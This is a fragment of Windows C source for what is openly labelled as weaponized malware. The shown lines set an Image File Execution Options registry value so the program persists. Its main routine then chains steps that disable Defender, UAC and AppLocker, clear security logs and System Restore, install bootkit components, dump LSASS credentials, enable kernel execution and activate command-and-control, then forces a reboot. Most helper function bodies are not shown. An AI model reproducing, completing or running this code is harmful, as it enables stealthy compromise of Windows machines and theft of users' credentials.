wchar_t debugger[MAX_PATH];
GetModuleFileNameW(NULL, debugger, MAX_PATH);
RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t)));
RegCloseKey(hKey);
wprintf(L"[+] IFEO persistence\n");
}
}
// ==============================
// MAIN
// ==============================
int main() {
ElevateSelf();
wprintf(L"\n[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***]\n");
// Phase 1: Disable core protections
wprintf(L"\n=== PHASE 1: CORE PROTECTIONS ===\n");
if (DisableTamperProtection()) Sleep(3000);
DisableDefender();
KillDefenderProcesses();
DisableUAC();
DisableAppLockerWDAC();
// Phase 2: Anti-forensics
wprintf(L"\n=== PHASE 2: ANTI-FORENSICS ===\n");
AddDefenderExclusions();
DisableSecurityLogs();
DisableSystemRestore();
DropTelemetryPackets();
ScrambleMemory();
// Phase 3: Persistence
wprintf(L"\n=== PHASE 3: PERSISTENCE ===\n");
AddPersistence();
InstallBootkitComponents();
// Phase 4: Service elimination
wprintf(L"\n=== PHASE 4: SERVICE ELIMINATION ===\n");
StopSecurityServices();
// Phase 5: Credential access
wprintf(L"\n=== PHASE 5: CREDENTIAL ACCESS ===\n");
DumpLSASS();
// Phase 6: Kernel bypass
wprintf(L"\n=== PHASE 6: KERNEL BYPASS ===\n");
EnableKernelExecution();
// Phase 7: Process protection
wprintf(L"\n=== PHASE 7: PROCESS PROTECTION ===\n");
RunAsPPL();
// Phase 8: C2 activation
wprintf(L"\n=== PHASE 8: C2 ACTIVATION ===\n");
NetworkC2Setup();
wprintf(L"\n[+] ALL PHASES COMPLETE\n");
wprintf(L"[!] REBOOT REQUIRED\n");
wprintf(L"[*] Press any key to restart...\n");
_getch();
system("shutdown /r /t 5");
return 0;
}